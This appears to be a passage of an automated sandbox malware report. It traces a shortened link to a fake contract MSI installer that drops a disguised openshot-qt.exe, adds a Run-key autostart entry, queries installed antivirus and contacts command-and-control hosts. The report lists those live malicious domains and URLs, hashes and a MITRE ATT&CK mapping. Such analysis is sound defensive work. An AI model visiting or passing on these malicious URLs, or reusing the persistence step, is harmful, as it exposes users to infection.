Source: openshot-qt.exe, 00000020.00000002.529546442.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, openshot-qt.exe, 00000021.00000002.529577377.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerT
Source: C:\Windows\SysWOW64\wget.exeQueries volume information: C:\Users\user\Desktop\download VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\Public\Documents\tqVXfZhGNW\tqVXfZhGNW.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\Public\Documents\tqVXfZhGNW\tqVXfZhGNW.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\Public\Documents\tqVXfZhGNW\tqVXfZhGNW.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\Public\Documents\tqVXfZhGNW\tqVXfZhGNW.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\Public\Documents\tqVXfZhGNW\tqVXfZhGNW.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\Public\Documents\tqVXfZhGNW\tqVXfZhGNW.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\Public\Documents\tqVXfZhGNW\tqVXfZhGNW.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeQueries volume information: C:\Users\Public\Documents\tqVXfZhGNW\libpython3.8.dll VolumeInformation
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeQueries volume information: C:\Users\Public\Documents\tqVXfZhGNW\libpython3.8.dll VolumeInformation
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\wget.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\Public\DocumentsJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\Public\Documents\tqVXfZhGNWJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\Public\DocumentsJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\Public\DocumentsJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\Public\Documents\tqVXfZhGNWJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\Public\DocumentsJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
1
Replication Through Removable Media
3
Windows Management Instrumentation
1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
11
Input Capture
11
Peripheral Device Discovery
1
Replication Through Removable Media
1
Archive Collected Data
Exfiltration Over Other Network Medium1
Ingress Tool Transfer
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts1
Native API
1
Registry Run Keys / Startup Folder
12
Process Injection
1
Deobfuscate/Decode Files or Information
LSASS Memory12
File and Directory Discovery
Remote Desktop Protocol1
Data from Local System
Exfiltration Over Bluetooth11
Encrypted Channel
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts11
Command and Scripting Interpreter
Logon Script (Windows)1
Registry Run Keys / Startup Folder
2
Obfuscated Files or Information
Security Account Manager33
System Information Discovery
SMB/Windows Admin Shares11
Input Capture
Automated Exfiltration3
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Software Packing
NTDS21
Security Software Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer4
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Timestomp
LSA Secrets2
Process Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
DLL Side-Loading
Cached Domain Credentials31
Virtualization/Sandbox Evasion
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
File Deletion
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job23
Masquerading
Proc Filesystem1
Remote System Discovery
Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
Modify Registry
/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)31
Virtualization/Sandbox Evasion
Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron12
Process Injection
Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 854202 URL: https://tinyurl.com/2abosd8k Startdate: 26/04/2023 Architecture: WINDOWS Score: 64 105 Snort IDS alert for network traffic 2->105 107 .NET source code contains potential unpacker 2->107 109 Contains functionality to log keystrokes (.Net Source) 2->109 9 msiexec.exe 14 38 2->9         started        12 cmd.exe 2 2->12         started        15 chrome.exe 18 8 2->15         started        18 2 other processes 2->18 process3 dnsIp4 71 C:\Windows\Installer\MSI795E.tmp, PE32 9->71 dropped 73 C:\Windows\Installer\MSI77A4.tmp, PE32 9->73 dropped 75 C:\Windows\Installer\MSI76D8.tmp, PE32 9->75 dropped 77 7 other files (none is malicious) 9->77 dropped 20 msiexec.exe 3 73 9->20         started        111 Uses cmd line tools excessively to alter registry or file data 12->111 113 Uses shutdown.exe to shutdown or reboot the system 12->113 24 wget.exe 2 12->24         started        26 conhost.exe 12->26         started        93 192.168.2.1 unknown unknown 15->93 95 192.168.2.23 unknown unknown 15->95 97 239.255.255.250 unknown Reserved 15->97 28 unarchiver.exe 4 15->28         started        30 chrome.exe 15->30         started        99 mondialarqcondicetchat.com 5.181.156.27, 443, 49717 MIVOCLOUDMD Moldova Republic of 18->99 101 amxx1515cabreun23.asxo 18->101 file5 signatures6 process7 dnsIp8 79 collect.installeranalytics.com 54.204.22.198, 49716, 80 AMAZON-AESUS United States 20->79 63 C:\Users\user\AppData\Local\...\shi5914.tmp, PE32 20->63 dropped 65 C:\Users\user\AppData\Local\...\shi5809.tmp, PE32 20->65 dropped 67 C:\Users\Public\Documents\...\openshot-qt.exe, PE32 20->67 dropped 69 C:\Users\Public\...\libpython3.8.dll, PE32 20->69 dropped 32 cmd.exe 1 20->32         started        35 cmd.exe 1 20->35         started        37 cmd.exe 1 20->37         started        81 empresas01.page.link 172.217.168.65, 443, 49697 GOOGLEUS United States 24->81 83 tinyurl.com 172.67.1.225, 443, 49696 CLOUDFLARENETUS United States 24->83 85 contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir 185.143.234.120, 443, 49698 ABRARVAN-ASAbrArvanCDNandIaaSIR Iran (ISLAMIC Republic Of) 24->85 39 cmd.exe 2 2 28->39         started        41 7za.exe 2 28->41         started        87 accounts.google.com 142.250.203.109, 443, 49702 GOOGLEUS United States 30->87 89 clients.l.google.com 142.250.203.110, 443, 49701 GOOGLEUS United States 30->89 91 5 other IPs or domains 30->91 file9 process10 signatures11 103 Uses cmd line tools excessively to alter registry or file data 32->103 43 reg.exe 1 1 32->43         started        45 conhost.exe 32->45         started        47 conhost.exe 35->47         started        49 shutdown.exe 1 35->49         started        51 conhost.exe 37->51         started        53 shutdown.exe 1 37->53         started        55 msiexec.exe 2 39->55         started        57 conhost.exe 39->57         started        59 conhost.exe 41->59         started        process12 process13 61 conhost.exe 43->61         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://tinyurl.com/2abosd8k0%Avira URL Cloudsafe
SourceDetectionScannerLabelLink
C:\Users\Public\Documents\tqVXfZhGNW\libpython3.8.dll0%ReversingLabs
C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\shi5809.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\shi5914.tmp0%ReversingLabs
C:\Windows\Installer\MSI6B19.tmp0%ReversingLabs
C:\Windows\Installer\MSI6BA7.tmp0%ReversingLabs
C:\Windows\Installer\MSI6CB1.tmp0%ReversingLabs
C:\Windows\Installer\MSI6D3F.tmp0%ReversingLabs
C:\Windows\Installer\MSI6DAD.tmp0%ReversingLabs
C:\Windows\Installer\MSI7129.tmp0%ReversingLabs
C:\Windows\Installer\MSI71C6.tmp0%ReversingLabs
C:\Windows\Installer\MSI76D8.tmp0%ReversingLabs
C:\Windows\Installer\MSI77A4.tmp0%ReversingLabs
C:\Windows\Installer\MSI795E.tmp0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://stuartk.com/jszip0%URL Reputationsafe
http://html4/loose.dtd0%Avira URL Cloudsafe
https://contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir/empresa01.html0%Avira URL Cloudsafe
https://contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir/empresa01.htmlk0%Avira URL Cloudsafe
http://.css0%Avira URL Cloudsafe
https://mondialarqcondicetchat.com0%Avira URL Cloudsafe
https://csp.withgoogle.com/csp/report-to/DurableDeepLinkUi/external0%Avira URL Cloudsafe
https://amxx1515cabreun23.asxo0%Avira URL Cloudsafe
https://empresas01.page.link/V9Hh?247748336240%Avira URL Cloudsafe
https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic0%Avira URL Cloudsafe
https://mondialarqcondicetchat.com/Alienware/index.php0%Avira URL Cloudsafe
https://mondialarqcondicetchat.com/Alienware/index.phpT0%Avira URL Cloudsafe
https://HTTP/1.10%Avira URL Cloudsafe
http://mondialarqcondicetchat.com0%Avira URL Cloudsafe
https://mondialarqcondicetchat.com40%Avira URL Cloudsafe
https://contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir/empresa01.htmlQ0%Avira URL Cloudsafe
https://empresas01.page.link/V9Hh?24774833624:0%Avira URL Cloudsafe
https://amxx1515cabreun23.asxo/0%Avira URL Cloudsafe
http://.jpg0%Avira URL Cloudsafe
https://amxx1515cabreun23.asxo40%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
tinyurl.com
172.67.1.225
truefalse
    high
    img001.prntscr.com
    104.23.139.12
    truefalse
      high
      collect.installeranalytics.com
      54.204.22.198
      truefalse
        high
        accounts.google.com
        142.250.203.109
        truefalse
          high
          cdnjs.cloudflare.com
          104.17.25.14
          truefalse
            high
            bit.ly
            67.199.248.11
            truefalse
              high
              contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir
              185.143.234.120
              truefalse
                unknown
                empresas01.page.link
                172.217.168.65
                truefalse
                  unknown
                  i1.wp.com
                  192.0.77.2
                  truefalse
                    high
                    clients.l.google.com
                    142.250.203.110
                    truefalse
                      high
                      mondialarqcondicetchat.com
                      5.181.156.27
                      truefalse
                        unknown
                        clients2.google.com
                        unknown
                        unknownfalse
                          high
                          amxx1515cabreun23.asxo
                          unknown
                          unknownfalse
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://cdnjs.cloudflare.com/ajax/libs/jszip-utils/0.1.0/jszip-utils.min.jsfalse
                              high
                              https://contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir/empresa01.htmlfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://bit.ly/3oDy7mmfalse
                                high
                                https://tinyurl.com/2abosd8kfalse
                                  high
                                  https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                    high
                                    https://cdnjs.cloudflare.com/ajax/libs/jszip/3.6.0/jszip.min.jsfalse
                                      high
                                      https://img001.prntscr.com/file/img001/LwwKUVJ1RTKn0DIWa1bTlw.pngfalse
                                        high
                                        https://empresas01.page.link/V9Hh?24774833624false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://mondialarqcondicetchat.com/Alienware/index.phpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://collect.installeranalytics.com/false
                                          high
                                          https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.jsfalse
                                            high
                                            https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/2.0.5/FileSaver.min.jsfalse
                                              high
                                              https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                                                high
                                                https://i1.wp.com/flevix.com/wp-content/uploads/2019/07/Focus-Loading-1.giffalse
                                                  high
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://html4/loose.dtdshi5809.tmp.17.drfalse
                                                  • Avira URL Cloud: safe
                                                  low
                                                  https://amxx1515cabreun23.asxoopenshot-qt.exe, 00000020.00000002.529546442.0000000002B32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir/empresa01.htmlkwget.exe, 00000002.00000003.260103939.0000000002DAD000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.260635446.0000000002DAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://github.com/nodeca/pako/blob/master/LICENSEchromecache_159.4.drfalse
                                                    high
                                                    https://csp.withgoogle.com/csp/report-to/DurableDeepLinkUi/externalwget.exe, 00000002.00000003.254152777.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.254152777.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.260103939.0000000002DAD000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.259511384.0000000002DAD000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.260635446.0000000002DAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://stuartk.com/jszipchromecache_159.4.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://.cssshi5809.tmp.17.drfalse
                                                    • Avira URL Cloud: safe
                                                    low
                                                    https://mondialarqcondicetchat.comopenshot-qt.exe, 00000020.00000002.529546442.0000000002AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://collect.installeranalytics.comMSI77A4.tmp.15.dr, 45a20c.msi.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, M Contrato UK .msi.8.drfalse
                                                      high
                                                      https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalyticMSI77A4.tmp.15.dr, 45a20c.msi.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, M Contrato UK .msi.8.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://mondialarqcondicetchat.com/Alienware/index.phpTopenshot-qt.exe, 00000020.00000002.529546442.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, openshot-qt.exe, 00000021.00000002.529577377.0000000003811000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://HTTP/1.1shi5809.tmp.17.drfalse
                                                      • Avira URL Cloud: safe
                                                      low
                                                      http://mondialarqcondicetchat.comopenshot-qt.exe, 00000020.00000002.529546442.0000000002B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://mondialarqcondicetchat.com4openshot-qt.exe, 00000020.00000002.529546442.0000000002AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir/empresa01.htmlQwget.exe, 00000002.00000003.260103939.0000000002DAD000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.259511384.0000000002DAD000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.260635446.0000000002DAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://raw.github.com/Stuk/jszip/master/LICENSE.markdown.chromecache_159.4.drfalse
                                                        high
                                                        https://www.thawte.com/cps0/7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drfalse
                                                          high
                                                          https://empresas01.page.link/V9Hh?24774833624:wget.exe, 00000002.00000002.260585684.0000000002D68000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.260147535.0000000002D64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.thawte.com/repository0W7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drfalse
                                                            high
                                                            https://www.advancedinstaller.com7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drfalse
                                                              high
                                                              https://amxx1515cabreun23.asxo/openshot-qt.exe, 00000020.00000002.529546442.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, openshot-qt.exe, 00000020.00000002.529546442.0000000002B2E000.00000004.00000800.00020000.00000000.sdmp, openshot-qt.exe, 00000020.00000002.529546442.0000000002B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://collect.installeranalytics.comMSI77A4.tmp.15.dr, 45a20c.msi.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, M Contrato UK .msi.8.drfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameopenshot-qt.exe, 00000020.00000002.529546442.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, openshot-qt.exe, 00000021.00000002.529577377.0000000003811000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://.jpgshi5809.tmp.17.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  low
                                                                  https://amxx1515cabreun23.asxo4openshot-qt.exe, 00000020.00000002.529546442.0000000002B32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  104.23.139.12
                                                                  img001.prntscr.comUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  172.67.1.225
                                                                  tinyurl.comUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  142.250.203.110
                                                                  clients.l.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  192.0.77.2
                                                                  i1.wp.comUnited States
                                                                  2635AUTOMATTICUSfalse
                                                                  239.255.255.250
                                                                  unknownReserved
                                                                  unknownunknownfalse
                                                                  54.204.22.198
                                                                  collect.installeranalytics.comUnited States
                                                                  14618AMAZON-AESUSfalse
                                                                  172.217.168.65
                                                                  empresas01.page.linkUnited States
                                                                  15169GOOGLEUSfalse
                                                                  185.143.234.120
                                                                  contratoempresarial.s3.ir-tbz-sh1.arvanstorage.irIran (ISLAMIC Republic Of)
                                                                  202468ABRARVAN-ASAbrArvanCDNandIaaSIRfalse
                                                                  104.17.25.14
                                                                  cdnjs.cloudflare.comUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  67.199.248.11
                                                                  bit.lyUnited States
                                                                  396982GOOGLE-PRIVATE-CLOUDUSfalse
                                                                  5.181.156.27
                                                                  mondialarqcondicetchat.comMoldova Republic of
                                                                  39798MIVOCLOUDMDfalse
                                                                  142.250.203.109
                                                                  accounts.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  IP
                                                                  192.168.2.1
                                                                  192.168.2.23
                                                                  Joe Sandbox Version:37.0.0 Beryl
                                                                  Analysis ID:854202
                                                                  Start date and time:2023-04-26 08:59:14 +02:00
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 13m 6s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:urldownload.jbs
                                                                  Sample URL:https://tinyurl.com/2abosd8k
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:36
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal64.rans.spyw.evad.win@60/48@12/14
                                                                  EGA Information:
                                                                  • Successful, ratio: 50%
                                                                  HDC Information:
                                                                  • Successful, ratio: 3.3% (good quality ratio 2.7%)
                                                                  • Quality average: 59.6%
                                                                  • Quality standard deviation: 37.9%
                                                                  HCA Information:
                                                                  • Successful, ratio: 99%
                                                                  • Number of executed functions: 58
                                                                  • Number of non-executed functions: 31
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 142.250.203.99, 34.104.35.123, 216.58.215.234, 172.217.168.10, 172.217.168.42, 172.217.168.74, 142.250.203.106
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, edgedl.me.gvt1.com, update.googleapis.com, clientservices.googleapis.com, firebasestorage.googleapis.com
                                                                  • Execution Graph export aborted for target unarchiver.exe, PID 8128 because it is empty
                                                                  • Execution Graph export aborted for target wget.exe, PID 6876 because there are no executed function
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                  TimeTypeDescription
                                                                  09:00:42API Interceptor3x Sleep call for process: msiexec.exe modified
                                                                  09:01:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run tqVXfZhGNW "C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe"
                                                                  09:01:30AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run tqVXfZhGNW "C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe"
                                                                  09:01:35API Interceptor286x Sleep call for process: openshot-qt.exe modified
                                                                  No context
                                                                  No context
                                                                  No context
                                                                  No context
                                                                  No context
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1164
                                                                  Entropy (8bit):5.703231005533959
                                                                  Encrypted:false
                                                                  SSDEEP:12:Eg+gdR472NaXvl/Sft2zWotHzPSW/QZoTmuwrapU/bH2CYDhiDmuNQwWJiIZdHXn:2gd277vz6SzSenrpU/PYDhiSuNToic1n
                                                                  MD5:32A8F208F73D03EC10F0C38B8CA8C196
                                                                  SHA1:A7DC37334A5840EBF33D7A810C3F948547EB2AC5
                                                                  SHA-256:6D048E533EEC388F50E24A20ED6142D0D56AE4CF5E9E8590C014D9ACB301216B
                                                                  SHA-512:7130B2DB94628B3ED0B71776EC5513B29DB466C51B591EB662EA6097D66D46D91D34486E3CFAB253B9EE66DECCCB7FD05A5546FC11F019D4C67484DD8AEE5855
                                                                  Malicious:false
                                                                  Reputation:low
